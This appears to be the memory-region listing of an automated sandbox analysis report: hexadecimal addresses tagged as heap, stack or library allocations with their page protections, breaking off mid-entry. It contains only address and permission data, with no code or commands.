196DBAB2000
|
trusted library allocation
|
page read and write
|
||
196DA9B8000
|
trusted library allocation
|
page read and write
|
||
16D30FAF000
|
heap
|
page read and write
|
||
7FFE7E450000
|
trusted library allocation
|
page read and write
|
||
196DB1EE000
|
trusted library allocation
|
page read and write
|
||
A52AAF8000
|
stack
|
page read and write
|
||
7FFE7E610000
|
trusted library allocation
|
page read and write
|
||
1AE0F000
|
stack
|
page read and write
|
||
1E84A722000
|
heap
|
page read and write
|
||
7FFE7E382000
|
trusted library allocation
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
6B3D0C000
|
stack
|
page read and write
|
||
7FFE7E310000
|
trusted library allocation
|
page execute and read and write
|
||
12443000
|
trusted library allocation
|
page read and write
|
||
16D31035000
|
heap
|
page read and write
|
||
7FFE7E569000
|
trusted library allocation
|
page read and write
|
||
1C37A10F000
|
heap
|
page read and write
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
1E84A718000
|
heap
|
page read and write
|
||
1E864B2C000
|
heap
|
page read and write
|
||
91F687E000
|
stack
|
page read and write
|
||
16D1A539000
|
trusted library allocation
|
page read and write
|
||
6B2F3B000
|
stack
|
page read and write
|
||
7FFE7E4B0000
|
trusted library allocation
|
page read and write
|
||
D66000
|
heap
|
page read and write
|
||
7FFE7E3B1000
|
trusted library allocation
|
page read and write
|
||
1AB90000
|
trusted library allocation
|
page read and write
|
||
1C37A000000
|
heap
|
page read and write
|
||
1C636000
|
heap
|
page read and write
|
||
1C3102EE000
|
trusted library allocation
|
page read and write
|
||
196DB49E000
|
trusted library allocation
|
page read and write
|
||
1C4BC000
|
stack
|
page read and write
|
||
1420000
|
heap
|
page read and write
|
||
7FFE7E570000
|
trusted library allocation
|
page read and write
|
||
91F6D7A000
|
stack
|
page read and write
|
||
196DAE6F000
|
trusted library allocation
|
page read and write
|
||
A52BA4C000
|
stack
|
page read and write
|
||
7FFE7E3B0000
|
trusted library allocation
|
page execute and read and write
|
||
1E864A81000
|
heap
|
page read and write
|
||
1C379D17000
|
heap
|
page read and write
|
||
1C377EBB000
|
heap
|
page read and write
|
||
196F263F000
|
heap
|
page read and write
|
||
1E864A1D000
|
heap
|
page read and write
|
||
196DB63F000
|
trusted library allocation
|
page read and write
|
||
7FFE7E57C000
|
trusted library allocation
|
page read and write
|
||
114A000
|
heap
|
page read and write
|
||
1E84E173000
|
trusted library allocation
|
page read and write
|
||
7FFE7E400000
|
trusted library allocation
|
page read and write
|
||
196DB6D1000
|
trusted library allocation
|
page read and write
|
||
7FFE7E530000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4C0000
|
trusted library allocation
|
page read and write
|
||
AC0000
|
heap
|
page execute and read and write
|
||
1E84D0D7000
|
trusted library allocation
|
page read and write
|
||
124C3000
|
trusted library allocation
|
page read and write
|
||
A52ADFE000
|
stack
|
page read and write
|
||
F60000
|
trusted library allocation
|
page read and write
|
||
815000
|
heap
|
page read and write
|
||
1E84D2C4000
|
trusted library allocation
|
page read and write
|
||
1C30188F000
|
trusted library allocation
|
page read and write
|
||
1E85C639000
|
trusted library allocation
|
page read and write
|
||
A52AC78000
|
stack
|
page read and write
|
||
1C377E72000
|
heap
|
page read and write
|
||
7FFE7E202000
|
trusted library allocation
|
page read and write
|
||
196DA27D000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2E0000
|
trusted library allocation
|
page execute and read and write
|
||
2120000
|
trusted library allocation
|
page read and write
|
||
16D30BD0000
|
heap
|
page read and write
|
||
16D30D80000
|
heap
|
page read and write
|
||
196DB851000
|
trusted library allocation
|
page read and write
|
||
7FFE7E240000
|
trusted library allocation
|
page read and write
|
||
16D30C88000
|
heap
|
page read and write
|
||
16D1A0AC000
|
trusted library allocation
|
page read and write
|
||
7FFE7E230000
|
trusted library allocation
|
page read and write
|
||
16D196F7000
|
trusted library allocation
|
page read and write
|
||
7DF4822F0000
|
trusted library allocation
|
page execute and read and write
|
||
2361000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2A0000
|
trusted library allocation
|
page read and write
|
||
196F22C0000
|
heap
|
page execute and read and write
|
||
1C37A150000
|
heap
|
page read and write
|
||
7FFE7E630000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3F0000
|
trusted library allocation
|
page execute and read and write
|
||
196D82D0000
|
trusted library allocation
|
page read and write
|
||
1E84C351000
|
trusted library allocation
|
page read and write
|
||
16D30D83000
|
heap
|
page read and write
|
||
67C000
|
heap
|
page read and write
|
||
16D30C3F000
|
heap
|
page read and write
|
||
196D9DB1000
|
trusted library allocation
|
page read and write
|
||
196D8390000
|
heap
|
page read and write
|
||
1E84C340000
|
heap
|
page read and write
|
||
1C301124000
|
trusted library allocation
|
page read and write
|
||
7FFE7E223000
|
trusted library allocation
|
page execute and read and write
|
||
1C301032000
|
trusted library allocation
|
page read and write
|
||
7FFE7E580000
|
trusted library allocation
|
page read and write
|
||
1C310308000
|
trusted library allocation
|
page read and write
|
||
1E84C1B0000
|
trusted library allocation
|
page read and write
|
||
16D18755000
|
heap
|
page read and write
|
||
E5C000
|
heap
|
page read and write
|
||
7FFE7E559000
|
trusted library allocation
|
page read and write
|
||
1C301163000
|
trusted library allocation
|
page read and write
|
||
4DE3F7E000
|
stack
|
page read and write
|
||
16D28A48000
|
trusted library allocation
|
page read and write
|
||
91F68FE000
|
stack
|
page read and write
|
||
16D19364000
|
trusted library allocation
|
page read and write
|
||
196DB8EB000
|
trusted library allocation
|
page read and write
|
||
7FFE7E330000
|
trusted library allocation
|
page execute and read and write
|
||
1E85C653000
|
trusted library allocation
|
page read and write
|
||
A52B9C9000
|
stack
|
page read and write
|
||
7FFE7E430000
|
trusted library allocation
|
page read and write
|
||
7FFE7E204000
|
trusted library allocation
|
page read and write
|
||
91F7AC7000
|
stack
|
page read and write
|
||
1E84E178000
|
trusted library allocation
|
page read and write
|
||
1C37A132000
|
heap
|
page read and write
|
||
1C3799C0000
|
heap
|
page read and write
|
||
7FFE7E656000
|
trusted library allocation
|
page read and write
|
||
1AFCE000
|
stack
|
page read and write
|
||
196DBAFB000
|
trusted library allocation
|
page read and write
|
||
1E84AAA5000
|
heap
|
page read and write
|
||
16D18620000
|
trusted library allocation
|
page read and write
|
||
16D30EA0000
|
heap
|
page execute and read and write
|
||
7DF43E430000
|
trusted library allocation
|
page execute and read and write
|
||
16D185D0000
|
trusted library section
|
page read and write
|
||
7FFE7E670000
|
trusted library allocation
|
page read and write
|
||
12448000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4B0000
|
trusted library allocation
|
page read and write
|
||
1C300BEB000
|
trusted library allocation
|
page read and write
|
||
7FFE7E500000
|
trusted library allocation
|
page read and write
|
||
15B57FF000
|
stack
|
page read and write
|
||
1C301006000
|
trusted library allocation
|
page read and write
|
||
7FFE7E54C000
|
trusted library allocation
|
page read and write
|
||
7FFE7E340000
|
trusted library allocation
|
page execute and read and write
|
||
1C377E78000
|
heap
|
page read and write
|
||
196DAE13000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1E0000
|
trusted library allocation
|
page read and write
|
||
1E84C1F0000
|
heap
|
page read and write
|
||
1E84CF5D000
|
trusted library allocation
|
page read and write
|
||
1C5C0000
|
heap
|
page read and write
|
||
7FFE7E4C0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1E3000
|
trusted library allocation
|
page execute and read and write
|
||
1C377E20000
|
trusted library section
|
page read and write
|
||
7FFE7E640000
|
trusted library allocation
|
page execute and read and write
|
||
1C379F20000
|
heap
|
page read and write
|
||
6B3D8E000
|
stack
|
page read and write
|
||
A52A59E000
|
stack
|
page read and write
|
||
18B84DD0000
|
heap
|
page read and write
|
||
1176000
|
heap
|
page read and write
|
||
196F20FD000
|
heap
|
page read and write
|
||
7FFE7E3A2000
|
trusted library allocation
|
page read and write
|
||
7FFE7E450000
|
trusted library allocation
|
page read and write
|
||
DA3000
|
heap
|
page read and write
|
||
7FFE7E490000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
1E84C175000
|
heap
|
page read and write
|
||
A52B84E000
|
stack
|
page read and write
|
||
7FFE7E540000
|
trusted library allocation
|
page read and write
|
||
196DB59F000
|
trusted library allocation
|
page read and write
|
||
1E84A753000
|
heap
|
page read and write
|
||
7FFE7E210000
|
trusted library allocation
|
page read and write
|
||
7FFE7E420000
|
trusted library allocation
|
page read and write
|
||
16D186D0000
|
heap
|
page execute and read and write
|
||
196DBBD2000
|
trusted library allocation
|
page read and write
|
||
2C62000
|
trusted library allocation
|
page read and write
|
||
1C37A167000
|
heap
|
page read and write
|
||
196D8082000
|
heap
|
page read and write
|
||
196F22C7000
|
heap
|
page execute and read and write
|
||
15B53FE000
|
stack
|
page read and write
|
||
1005000
|
heap
|
page read and write
|
||
7FFE7E539000
|
trusted library allocation
|
page read and write
|
||
235D000
|
trusted library allocation
|
page read and write
|
||
A52A493000
|
stack
|
page read and write
|
||
2FA1000
|
trusted library allocation
|
page read and write
|
||
6B2AFF000
|
stack
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
15B6847000
|
stack
|
page read and write
|
||
F80000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3F8000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
7FFE7E500000
|
trusted library allocation
|
page read and write
|
||
2CA1000
|
trusted library allocation
|
page read and write
|
||
1C634000
|
heap
|
page read and write
|
||
16D185A0000
|
heap
|
page read and write
|
||
1E864AF0000
|
heap
|
page read and write
|
||
1C379990000
|
heap
|
page execute and read and write
|
||
7FFE7E430000
|
trusted library allocation
|
page read and write
|
||
16D28A56000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4F0000
|
trusted library allocation
|
page read and write
|
||
1E85C381000
|
trusted library allocation
|
page read and write
|
||
1AE8E000
|
stack
|
page read and write
|
||
E1E000
|
heap
|
page read and write
|
||
1E84D2B3000
|
trusted library allocation
|
page read and write
|
||
1E864BC0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E578000
|
trusted library allocation
|
page read and write
|
||
196D807C000
|
heap
|
page read and write
|
||
7FFE7E410000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1F0000
|
trusted library allocation
|
page read and write
|
||
1E84A74D000
|
heap
|
page read and write
|
||
196DB718000
|
trusted library allocation
|
page read and write
|
||
196D807E000
|
heap
|
page read and write
|
||
1E84DBE0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4E0000
|
trusted library allocation
|
page read and write
|
||
1E84CDA2000
|
trusted library allocation
|
page read and write
|
||
1E84DCA1000
|
trusted library allocation
|
page read and write
|
||
124C1000
|
trusted library allocation
|
page read and write
|
||
1B90F000
|
unkown
|
page read and write
|
||
196E9DB1000
|
trusted library allocation
|
page read and write
|
||
1E84E153000
|
trusted library allocation
|
page read and write
|
||
100C000
|
heap
|
page read and write
|
||
196EA09C000
|
trusted library allocation
|
page read and write
|
||
A52B8CC000
|
stack
|
page read and write
|
||
16D16F85000
|
heap
|
page read and write
|
||
1C3013C7000
|
trusted library allocation
|
page read and write
|
||
7FF000
|
stack
|
page read and write
|
||
82C000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
196DB19E000
|
trusted library allocation
|
page read and write
|
||
196DB31C000
|
trusted library allocation
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
1E864746000
|
heap
|
page read and write
|
||
7FFE7E1FB000
|
trusted library allocation
|
page read and write
|
||
196DB0B6000
|
trusted library allocation
|
page read and write
|
||
196DB236000
|
trusted library allocation
|
page read and write
|
||
7FFE7E202000
|
trusted library allocation
|
page read and write
|
||
24B0000
|
heap
|
page execute and read and write
|
||
7DF409F50000
|
trusted library allocation
|
page execute and read and write
|
||
1E84A6C0000
|
heap
|
page read and write
|
||
7FFE7E20D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E3C0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2C6000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3A0000
|
trusted library allocation
|
page execute and read and write
|
||
15B567E000
|
stack
|
page read and write
|
||
1D40E000
|
stack
|
page read and write
|
||
196DA801000
|
trusted library allocation
|
page read and write
|
||
16D16C4B000
|
heap
|
page read and write
|
||
16D30F7F000
|
heap
|
page read and write
|
||
7FFE7E554000
|
trusted library allocation
|
page read and write
|
||
7FFE7E410000
|
trusted library allocation
|
page read and write
|
||
1E84C3D5000
|
trusted library allocation
|
page read and write
|
||
1C379854000
|
heap
|
page read and write
|
||
1E864B24000
|
heap
|
page read and write
|
||
7FFE7E2B0000
|
trusted library allocation
|
page execute and read and write
|
||
196DAD55000
|
trusted library allocation
|
page read and write
|
||
7FFE7E548000
|
trusted library allocation
|
page read and write
|
||
7FFE7E39A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3F0000
|
trusted library allocation
|
page read and write
|
||
1AF50000
|
heap
|
page execute and read and write
|
||
196DB401000
|
trusted library allocation
|
page read and write
|
||
1E8648A0000
|
heap
|
page read and write
|
||
1B51D000
|
stack
|
page read and write
|
||
16D1A55E000
|
trusted library allocation
|
page read and write
|
||
1E86470A000
|
heap
|
page read and write
|
||
7FFE7E3D0000
|
trusted library allocation
|
page execute and read and write
|
||
6B3C0B000
|
stack
|
page read and write
|
||
196DADE2000
|
trusted library allocation
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
1BADB000
|
heap
|
page read and write
|
||
15B66CE000
|
stack
|
page read and write
|
||
1E84C110000
|
trusted library allocation
|
page read and write
|
||
91F6FFB000
|
stack
|
page read and write
|
||
7FFE7E3C2000
|
trusted library allocation
|
page read and write
|
||
7FFE7E390000
|
trusted library allocation
|
page read and write
|
||
1540000
|
heap
|
page read and write
|
||
1C30022A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3C2000
|
trusted library allocation
|
page read and write
|
||
12B5000
|
heap
|
page read and write
|
||
1E84D2D0000
|
trusted library allocation
|
page read and write
|
||
6B2DBE000
|
stack
|
page read and write
|
||
196DB5D9000
|
trusted library allocation
|
page read and write
|
||
1B0ED000
|
stack
|
page read and write
|
||
196DAD4D000
|
trusted library allocation
|
page read and write
|
||
1E84D2BF000
|
trusted library allocation
|
page read and write
|
||
16D30EC0000
|
heap
|
page read and write
|
||
16D1A57E000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4B0000
|
trusted library allocation
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
7FFE7E513000
|
trusted library allocation
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
16D19A6A000
|
trusted library allocation
|
page read and write
|
||
23EE000
|
stack
|
page read and write
|
||
7FFE7E542000
|
trusted library allocation
|
page read and write
|
||
1C310070000
|
trusted library allocation
|
page read and write
|
||
16D194D1000
|
trusted library allocation
|
page read and write
|
||
7FFE7E490000
|
trusted library allocation
|
page read and write
|
||
91F6DFE000
|
stack
|
page read and write
|
||
7FFE7E29E000
|
trusted library allocation
|
page execute and read and write
|
||
16D3103C000
|
heap
|
page read and write
|
||
14B0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3F2000
|
trusted library allocation
|
page read and write
|
||
7FFE7E480000
|
trusted library allocation
|
page read and write
|
||
7FFE7E670000
|
trusted library allocation
|
page read and write
|
||
1C379DCB000
|
heap
|
page read and write
|
||
16D18690000
|
trusted library allocation
|
page read and write
|
||
1C3102F8000
|
trusted library allocation
|
page read and write
|
||
16D19B22000
|
trusted library allocation
|
page read and write
|
||
2BE5000
|
trusted library allocation
|
page read and write
|
||
7FFE7E202000
|
trusted library allocation
|
page read and write
|
||
7FFE7E210000
|
trusted library allocation
|
page read and write
|
||
1E84C579000
|
trusted library allocation
|
page read and write
|
||
7FFE7E570000
|
trusted library allocation
|
page read and write
|
||
1C377D90000
|
heap
|
page read and write
|
||
196DB9CE000
|
trusted library allocation
|
page read and write
|
||
12358000
|
trusted library allocation
|
page read and write
|
||
16D19FEB000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E410000
|
trusted library allocation
|
page read and write
|
||
91F6CF8000
|
stack
|
page read and write
|
||
16D185E0000
|
trusted library allocation
|
page read and write
|
||
91F6CFE000
|
stack
|
page read and write
|
||
1C3011DB000
|
trusted library allocation
|
page read and write
|
||
12F91000
|
trusted library allocation
|
page read and write
|
||
7FFE7E454000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1FD000
|
trusted library allocation
|
page execute and read and write
|
||
7DF40F6C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E296000
|
trusted library allocation
|
page read and write
|
||
1CACA000
|
stack
|
page read and write
|
||
196DB934000
|
trusted library allocation
|
page read and write
|
||
7FFE7E24D000
|
trusted library allocation
|
page execute and read and write
|
||
1E84E12E000
|
trusted library allocation
|
page read and write
|
||
7FFE7E440000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
7FFE7E610000
|
trusted library allocation
|
page read and write
|
||
15B5C7E000
|
stack
|
page read and write
|
||
196DB4E6000
|
trusted library allocation
|
page read and write
|
||
7FFE7E20D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E4D0000
|
trusted library allocation
|
page read and write
|
||
1E864800000
|
heap
|
page execute and read and write
|
||
196DB63B000
|
trusted library allocation
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
1E84AAA0000
|
heap
|
page read and write
|
||
16D30EF0000
|
heap
|
page read and write
|
||
1BF1D000
|
stack
|
page read and write
|
||
196DA9AA000
|
trusted library allocation
|
page read and write
|
||
16D28A4C000
|
trusted library allocation
|
page read and write
|
||
7FFE7E24B000
|
trusted library allocation
|
page execute and read and write
|
||
196DAB24000
|
trusted library allocation
|
page read and write
|
||
1C8D2000
|
heap
|
page read and write
|
||
16D30BE7000
|
heap
|
page read and write
|
||
1CE08000
|
stack
|
page read and write
|
||
196DADB6000
|
trusted library allocation
|
page read and write
|
||
196DB6FC000
|
trusted library allocation
|
page read and write
|
||
7FFE7E5DA000
|
trusted library allocation
|
page read and write
|
||
2351000
|
trusted library allocation
|
page read and write
|
||
2CBF000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2C6000
|
trusted library allocation
|
page execute and read and write
|
||
1E84A6F0000
|
heap
|
page read and write
|
||
6B2FBE000
|
stack
|
page read and write
|
||
196D82C0000
|
heap
|
page readonly
|
||
196DBBD7000
|
trusted library allocation
|
page read and write
|
||
7FFE7E410000
|
trusted library allocation
|
page read and write
|
||
A5F000
|
stack
|
page read and write
|
||
1E84D2C8000
|
trusted library allocation
|
page read and write
|
||
91F7BCE000
|
stack
|
page read and write
|
||
1A8DD000
|
stack
|
page read and write
|
||
1E84D527000
|
trusted library allocation
|
page read and write
|
||
1E84C170000
|
heap
|
page read and write
|
||
1BA8E000
|
stack
|
page read and write
|
||
16D16C5D000
|
heap
|
page read and write
|
||
16D19FC5000
|
trusted library allocation
|
page read and write
|
||
196F24E0000
|
heap
|
page read and write
|
||
16D19821000
|
trusted library allocation
|
page read and write
|
||
1E85C3BB000
|
trusted library allocation
|
page read and write
|
||
5B9000
|
heap
|
page read and write
|
||
7FFE7E510000
|
trusted library allocation
|
page read and write
|
||
15B5A7B000
|
stack
|
page read and write
|
||
16D19A07000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
16D287CF000
|
trusted library allocation
|
page read and write
|
||
A52A87E000
|
stack
|
page read and write
|
||
7FFE7E22B000
|
trusted library allocation
|
page read and write
|
||
7FFE7E560000
|
trusted library allocation
|
page read and write
|
||
16D311B0000
|
heap
|
page read and write
|
||
1B5DA000
|
stack
|
page read and write
|
||
1545000
|
heap
|
page read and write
|
||
7FFE7E480000
|
trusted library allocation
|
page read and write
|
||
16D19884000
|
trusted library allocation
|
page read and write
|
||
19DF000
|
stack
|
page read and write
|
||
1C300CA5000
|
trusted library allocation
|
page read and write
|
||
1B8DE000
|
stack
|
page read and write
|
||
16D194DA000
|
trusted library allocation
|
page read and write
|
||
1E86470C000
|
heap
|
page read and write
|
||
1AF90000
|
heap
|
page execute and read and write
|
||
140F000
|
stack
|
page read and write
|
||
7FFE7E2B6000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3D0000
|
trusted library allocation
|
page execute and read and write
|
||
1E864A47000
|
heap
|
page read and write
|
||
7FFE7E3C8000
|
trusted library allocation
|
page read and write
|
||
7FFE7E5FA000
|
trusted library allocation
|
page read and write
|
||
2BE3000
|
trusted library allocation
|
page read and write
|
||
7FFE7E56C000
|
trusted library allocation
|
page read and write
|
||
1E864B28000
|
heap
|
page read and write
|
||
196DB747000
|
trusted library allocation
|
page read and write
|
||
196DBB67000
|
trusted library allocation
|
page read and write
|
||
16D1A583000
|
trusted library allocation
|
page read and write
|
||
1E84D2CC000
|
trusted library allocation
|
page read and write
|
||
91F6C77000
|
stack
|
page read and write
|
||
196EA0A4000
|
trusted library allocation
|
page read and write
|
||
850000
|
unkown
|
page readonly
|
||
7FFE7E2E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E3D0000
|
trusted library allocation
|
page execute and read and write
|
||
196F261B000
|
heap
|
page read and write
|
||
1E864A0D000
|
heap
|
page read and write
|
||
18B85115000
|
heap
|
page read and write
|
||
7FFE7E420000
|
trusted library allocation
|
page read and write
|
||
82F000
|
heap
|
page read and write
|
||
7FFE7E600000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2B0000
|
trusted library allocation
|
page read and write
|
||
16D185C0000
|
trusted library section
|
page read and write
|
||
12441000
|
trusted library allocation
|
page read and write
|
||
1A9CD000
|
stack
|
page read and write
|
||
528000
|
heap
|
page read and write
|
||
7FFE7E610000
|
trusted library allocation
|
page read and write
|
||
7FFE7E204000
|
trusted library allocation
|
page read and write
|
||
A52A97E000
|
stack
|
page read and write
|
||
7FFE7E23C000
|
trusted library allocation
|
page execute and read and write
|
||
1C379DA7000
|
heap
|
page read and write
|
||
7FFE7E490000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1F3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E450000
|
trusted library allocation
|
page read and write
|
||
1C3102F0000
|
trusted library allocation
|
page read and write
|
||
2C20000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4F0000
|
trusted library allocation
|
page read and write
|
||
196DB775000
|
trusted library allocation
|
page read and write
|
||
196F20F0000
|
heap
|
page read and write
|
||
2BDD000
|
trusted library allocation
|
page read and write
|
||
7FFE7E26C000
|
trusted library allocation
|
page execute and read and write
|
||
196D8240000
|
heap
|
page read and write
|
||
7FFE7E630000
|
trusted library allocation
|
page read and write
|
||
196F2159000
|
heap
|
page read and write
|
||
7FFE7E570000
|
trusted library allocation
|
page read and write
|
||
196DAB67000
|
trusted library allocation
|
page read and write
|
||
16D16F80000
|
heap
|
page read and write
|
||
196DB57F000
|
trusted library allocation
|
page read and write
|
||
D6C000
|
heap
|
page read and write
|
||
7FFE7E204000
|
trusted library allocation
|
page read and write
|
||
7FFE7E450000
|
trusted library allocation
|
page read and write
|
||
7FFE7E640000
|
trusted library allocation
|
page read and write
|
||
81F000
|
heap
|
page read and write
|
||
6B2A7E000
|
stack
|
page read and write
|
||
16D16BB0000
|
heap
|
page read and write
|
||
7FFE7E290000
|
trusted library allocation
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
2C6A000
|
trusted library allocation
|
page read and write
|
||
1C3012A7000
|
trusted library allocation
|
page read and write
|
||
7FFE7E203000
|
trusted library allocation
|
page execute and read and write
|
||
16D1976A000
|
trusted library allocation
|
page read and write
|
||
1E84A794000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
1E84D5F3000
|
trusted library allocation
|
page read and write
|
||
1E864AC1000
|
heap
|
page read and write
|
||
7FFE7E3C4000
|
trusted library allocation
|
page read and write
|
||
2CAD000
|
trusted library allocation
|
page read and write
|
||
E9E000
|
stack
|
page read and write
|
||
6F5000
|
heap
|
page read and write
|
||
1AD1E000
|
stack
|
page read and write
|
||
196E9DD1000
|
trusted library allocation
|
page read and write
|
||
196D8290000
|
heap
|
page read and write
|
||
196DB283000
|
trusted library allocation
|
page read and write
|
||
1E864AF5000
|
heap
|
page read and write
|
||
7FF413460000
|
trusted library allocation
|
page execute and read and write
|
||
91F6AF9000
|
stack
|
page read and write
|
||
1E84C0F0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E29C000
|
trusted library allocation
|
page execute and read and write
|
||
61C000
|
heap
|
page read and write
|
||
16D3104C000
|
heap
|
page read and write
|
||
244F000
|
trusted library allocation
|
page read and write
|
||
7FFE7E650000
|
trusted library allocation
|
page read and write
|
||
196DB054000
|
trusted library allocation
|
page read and write
|
||
1C3004CD000
|
trusted library allocation
|
page read and write
|
||
1C37A380000
|
heap
|
page read and write
|
||
1E84C120000
|
heap
|
page readonly
|
||
7FFE7E480000
|
trusted library allocation
|
page read and write
|
||
1BD1E000
|
stack
|
page read and write
|
||
7FFE7E420000
|
trusted library allocation
|
page read and write
|
||
1C379D59000
|
heap
|
page read and write
|
||
7FFE7E3E8000
|
trusted library allocation
|
page read and write
|
||
1E864A09000
|
heap
|
page read and write
|
||
7FFE7E1F4000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2D6000
|
trusted library allocation
|
page execute and read and write
|
||
1C37A17B000
|
heap
|
page read and write
|
||
7FFE7E460000
|
trusted library allocation
|
page read and write
|
||
A52A9F7000
|
stack
|
page read and write
|
||
1BA74000
|
heap
|
page read and write
|
||
1E84C180000
|
trusted library allocation
|
page read and write
|
||
196D82B0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1FD000
|
trusted library allocation
|
page execute and read and write
|
||
511000
|
stack
|
page read and write
|
||
7FFE7E500000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2D6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E560000
|
trusted library allocation
|
page read and write
|
||
7FFE7E22D000
|
trusted library allocation
|
page execute and read and write
|
||
6B2D79000
|
stack
|
page read and write
|
||
7FFE7E539000
|
trusted library allocation
|
page read and write
|
||
1C379750000
|
trusted library allocation
|
page read and write
|
||
A52AA7D000
|
stack
|
page read and write
|
||
91F6A7E000
|
stack
|
page read and write
|
||
1C379D93000
|
heap
|
page read and write
|
||
196EA0B4000
|
trusted library allocation
|
page read and write
|
||
16D30C3D000
|
heap
|
page read and write
|
||
196F25E5000
|
heap
|
page read and write
|
||
7DF4822E0000
|
trusted library allocation
|
page execute and read and write
|
||
A52A51E000
|
stack
|
page read and write
|
||
18B84DA0000
|
heap
|
page read and write
|
||
1450000
|
heap
|
page read and write
|
||
1C37A0A9000
|
heap
|
page read and write
|
||
1138000
|
heap
|
page read and write
|
||
7FFE7E400000
|
trusted library allocation
|
page execute and read and write
|
||
1C3010BF000
|
trusted library allocation
|
page read and write
|
||
7FFE7E300000
|
trusted library allocation
|
page execute and read and write
|
||
196D8052000
|
heap
|
page read and write
|
||
7FFE7E610000
|
trusted library allocation
|
page execute and read and write
|
||
2C9E000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3D0000
|
trusted library allocation
|
page execute and read and write
|
||
1E84D2B7000
|
trusted library allocation
|
page read and write
|
||
1D10A000
|
stack
|
page read and write
|
||
1C3018F2000
|
trusted library allocation
|
page read and write
|
||
16D16BE0000
|
heap
|
page read and write
|
||
7FFE7E3C4000
|
trusted library allocation
|
page read and write
|
||
508000
|
heap
|
page read and write
|
||
51B000
|
heap
|
page read and write
|
||
4DE3EFE000
|
unkown
|
page read and write
|
||
1C377E6D000
|
heap
|
page read and write
|
||
7FFE7E204000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2C0000
|
trusted library allocation
|
page read and write
|
||
F90000
|
trusted library allocation
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
1E84A755000
|
heap
|
page read and write
|
||
7FFE7E224000
|
trusted library allocation
|
page read and write
|
||
1C377DB0000
|
heap
|
page read and write
|
||
7FFE7E391000
|
trusted library allocation
|
page read and write
|
||
7FFE7E25C000
|
trusted library allocation
|
page execute and read and write
|
||
196D8086000
|
heap
|
page read and write
|
||
A52A8FA000
|
stack
|
page read and write
|
||
18B84DB0000
|
heap
|
page read and write
|
||
16D31032000
|
heap
|
page read and write
|
||
6B313C000
|
stack
|
page read and write
|
||
22FE000
|
stack
|
page read and write
|
||
5C5000
|
heap
|
page read and write
|
||
1C379E02000
|
heap
|
page read and write
|
||
7FFE7E510000
|
trusted library allocation
|
page read and write
|
||
1E84C130000
|
trusted library allocation
|
page read and write
|
||
16D30FB4000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
1C0000
|
unkown
|
page readonly
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
A52AE7B000
|
stack
|
page read and write
|
||
53C000
|
heap
|
page read and write
|
||
7FFE7E430000
|
trusted library allocation
|
page read and write
|
||
196D8048000
|
heap
|
page read and write
|
||
7FFE7E24C000
|
trusted library allocation
|
page execute and read and write
|
||
124C8000
|
trusted library allocation
|
page read and write
|
||
1510000
|
heap
|
page execute and read and write
|
||
196F2654000
|
heap
|
page read and write
|
||
1C379D10000
|
heap
|
page read and write
|
||
1E84A6D0000
|
heap
|
page read and write
|
||
1C379720000
|
trusted library allocation
|
page read and write
|
||
16D18988000
|
trusted library allocation
|
page read and write
|
||
2441000
|
trusted library allocation
|
page read and write
|
||
7FFE7E630000
|
trusted library allocation
|
page execute and read and write
|
||
1C377E38000
|
heap
|
page read and write
|
||
7FFE7E590000
|
trusted library allocation
|
page read and write
|
||
7FFE7E650000
|
trusted library allocation
|
page read and write
|
||
7FFE7E22D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E310000
|
